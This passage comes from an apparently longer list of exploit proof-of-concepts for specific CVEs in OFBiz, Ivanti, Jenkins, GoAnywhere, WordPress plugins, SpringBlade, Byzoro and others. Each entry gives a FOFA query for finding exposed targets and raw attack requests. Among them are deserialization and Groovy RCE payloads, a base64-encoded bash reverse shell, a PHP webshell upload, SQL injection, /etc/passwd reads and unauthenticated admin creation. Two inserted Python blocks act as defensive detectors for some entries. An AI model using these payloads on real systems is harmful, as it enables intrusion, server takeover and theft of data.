pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Same handler behaviour as entry 93 through a second import action; verify with the name that was uploaded:

GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated base64 into the <serializable> element of the POC above (recompute Content-Length for the actual body):
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD
96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

The Groovy program is executed server-side; wrapping the command output in an exception makes it come back in the error response.

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

The base64 string decodes to bash%20-i%20>&%20/dev/tcp/192.168.40.128/7777%200>&1, i.e. a bash reverse shell to 192.168.40.128:7777 with its spaces percent-encoded; re-encode it for your own listener address.

97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

The script parameter closes the function body with %7D (}), injects the Java call, and reopens a brace with %7B so the saved function still compiles.

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

The body is the percent-encoded JSON {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | echo hello"]}; the param value is passed to a shell, so the | separator runs the injected command.

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file"; filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

The /api/v1/totp/user-backup-code/../../ prefix reaches the endpoint without authentication (the CVE-2023-46805 bypass this injection is chained with); the %3b (;) after keys-status/ terminates the expected argument and the rest of the path runs as a shell command.

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

The SSRF sits in the ds:RetrievalMethod URI: the SAML component fetches the referenced key material from the attacker-supplied URL, so a DNS or HTTP callback on the dnslog host confirms the vulnerability.

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML (an external parameter entity, so the callback fires when the DTD is processed):
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

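Entries 102 and 103 above both ride on XML that the SAML endpoint parses: 102 plants a ds:RetrievalMethod whose URI the server dereferences, 103 plants a DTD with an external parameter entity. The Python below is an added example, not Ivanti's code and not part of the original list; it decodes a SAMLRequest the way the POST binding does (plain base64; the raw-DEFLATE fallback for the Redirect binding is an assumption about the deployment) and flags both patterns before the document ever reaches an XML parser. The sample inputs are the two payloads from those entries (the SOAP body trimmed to the signature element), plus a constructed benign request for contrast.

```python
import base64
import re
import zlib
import xml.etree.ElementTree as ET

DS_NS = "http://www.w3.org/2000/09/xmldsig#"
# Any DTD at all is rejected: a SAML message never legitimately carries one,
# and refusing before parsing is what stops entity expansion and external fetches.
DTD_RE = re.compile(rb"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)
REMOTE_URI_RE = re.compile(r"^\s*(https?|ftp|file|jar|gopher)\s*:", re.IGNORECASE)

def decode_saml_request(value: str) -> bytes:
    """Decode a SAMLRequest form value. The POST binding sends plain base64 XML;
    the Redirect binding additionally DEFLATE-compresses it (assumed fallback here,
    so a compressed payload is not waved through undecoded)."""
    raw = base64.b64decode(value)
    if raw.lstrip().startswith(b"<"):
        return raw
    return zlib.decompress(raw, -15)   # raw DEFLATE, no zlib header

def inspect_saml_xml(doc: bytes) -> list:
    """Return the reasons to reject the document (an empty list means clean)."""
    findings = []
    if DTD_RE.search(doc):
        # Entry 103: <!DOCTYPE root [<!ENTITY % x SYSTEM "http://..."> %x;]>
        findings.append("DTD/ENTITY declaration present")
        return findings          # never hand a DTD-bearing document to the parser
    try:
        root = ET.fromstring(doc)
    except ET.ParseError as exc:
        return ["malformed XML: %s" % exc]
    # Entry 102: a RetrievalMethod URI the signature verifier would fetch
    for el in root.iter("{%s}RetrievalMethod" % DS_NS):
        uri = el.get("URI", "")
        if REMOTE_URI_RE.match(uri):
            findings.append("RetrievalMethod fetches remote key material: " + uri)
    return findings

# Constructed sample inputs: the payloads of entries 103 and 102 above.
SAMPLE_SAMLREQUEST = (
    "PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0K"
    "ICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg=="
)
SAMPLE_SOAP = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
    b'<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo>'
    b'<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>'
    b'<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>'
    b'</ds:SignedInfo><ds:SignatureValue>qwerty</ds:SignatureValue>'
    b'<ds:KeyInfo><ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/></ds:KeyInfo>'
    b'<ds:Object></ds:Object></ds:Signature></soap:Body></soap:Envelope>'
)
# A benign request with neither a DTD nor a RetrievalMethod (constructed).
SAMPLE_CLEAN = b'<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_1"/>'

if __name__ == "__main__":
    for name, doc in (("entry 103", decode_saml_request(SAMPLE_SAMLREQUEST)),
                      ("entry 102", SAMPLE_SOAP), ("clean", SAMPLE_CLEAN)):
        print(name, inspect_saml_xml(doc) or "ok")
```

Run it before the XML reaches the SAML library, not after: the DTD check is a byte-level scan precisely so that no parser (and no entity resolver) sees the document first. The RetrievalMethod check is narrower than a real fix, which is to disable remote key retrieval in the signature library altogether.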
104. TOTOLINK T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

The request is answered with an empty token, so no authentication is required to read the system status configuration.

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Blade-Auth carries a JWT; if the target rejects the token above, replace it with one the target accepts (see entry 107). The version string is returned inside the updatexml XPath error.

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own JWT>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


Both requests share the same Session id. The download side returns the CLI output, in which the first line of /etc/passwd has been consumed as the help command's argument and the second line appears in the "Too many arguments" error:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The ..;/ segment gets past the path check and reaches the initial account-setup wizard, from which a new administrator account can be created.

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Time-based: a response delayed by about 6 seconds confirms the injection.

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA:body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce (it is embedded in the front page's HTML; search the response for "nonce":"...")
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce and execute the command (the queryEditor string is evaluated as PHP)
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket plugin file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Affected versions: 7.9.11 - 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

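Several of the entries above are visible in ordinary web-server access logs because the whole probe sits in the request line: the updatexml()/SLEEP() blind-SQLi probes of the SpringBlade and WordPress entries (105, 106, 107, 111, 114, 117), the requirePasswordChange=Y bypass on the OFBiz webtools endpoints (95, 96), the ..;/ path-normalization trick against GoAnywhere (110) and the ../ traversal followed by a ; command separator in the Ivanti Policy Secure URL (101). The Python below is an added example, not part of the original list: it parses combined-format log lines, percent-decodes the request target (twice, to surface double encoding) and applies indicator rules derived from those POCs. The log lines are constructed from the POC request lines plus one benign request; the rule names and regexes are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Apache/nginx "combined" format: ip ident user [time] "METHOD target HTTP/x" status size ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Indicator rules derived from the POC request lines above (names are this example's own).
RULES = [
    ("mysql-blind-sqli",           re.compile(r"\b(updatexml|extractvalue)\s*\(|\bsleep\s*\(", re.I)),
    ("ofbiz-requirePasswordChange", re.compile(r"/webtools/control/.*requirePasswordChange=Y", re.I)),
    ("tomcat-dotdot-semicolon",    re.compile(r"/\.\.;/")),
    ("ivanti-traversal-cmdsep",    re.compile(r"/api/v1/.*/\.\./.*[;&|]")),
]

def decode_target(target: str) -> str:
    """Percent-decode until stable (at most two rounds) so %2528 and %3b both surface."""
    for _ in range(2):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target

def scan_log(text: str) -> list:
    """Return (rule, client_ip, decoded_target) for every matching line, in log order."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                    # not a combined-format line; skip rather than guess
        target = decode_target(m.group("target"))
        for name, pattern in RULES:
            if pattern.search(target):
                hits.append((name, m.group("ip"), target))
                break                   # one verdict per line; first rule wins
    return hits

# Constructed sample log: request lines lifted from the entries above, plus one benign line.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2024:10:01:02 +0000] "GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
10.0.0.6 - - [12/May/2024:10:01:03 +0000] "POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 1284 "-" "Mozilla/5.0"
10.0.0.7 - - [12/May/2024:10:01:04 +0000] "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 9013 "-" "Mozilla/5.0"
10.0.0.8 - - [12/May/2024:10:01:05 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1" 403 0 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2024:10:01:06 +0000] "GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1" 200 44 "-" "Mozilla/5.0"
10.0.0.10 - - [12/May/2024:10:01:07 +0000] "GET /api/blade-system/tenant/list?current=1&size=10 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for rule, ip, target in scan_log(SAMPLE_LOG):
        print(f"{rule:28} {ip:10} {target}")
```

The sleep( rule will also fire on legitimate parameters that happen to contain that text, so treat it as a triage signal and confirm time-based probes by pairing the hit with the request's service time ($request_time in nginx, %D in Apache), which the blind payloads push to the SLEEP value. POST-body injections such as entry 112 are not in the request line and need body logging or a WAF to see.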
118. Beijing Byzoro (北京百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


The txt_path field sets where the uploaded content is written. Then access /home/src.php; the webshell runs the command given in the passwd POST parameter.

119. Beijing Byzoro (北京百绰) Smart S20 admin back-end sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://x.x.x.x:8443
Referer: https://x.x.x.x:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

Time-based: the response is delayed by about 5 seconds when the database name is 3 characters long.

120. Beijing Byzoro (北京百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
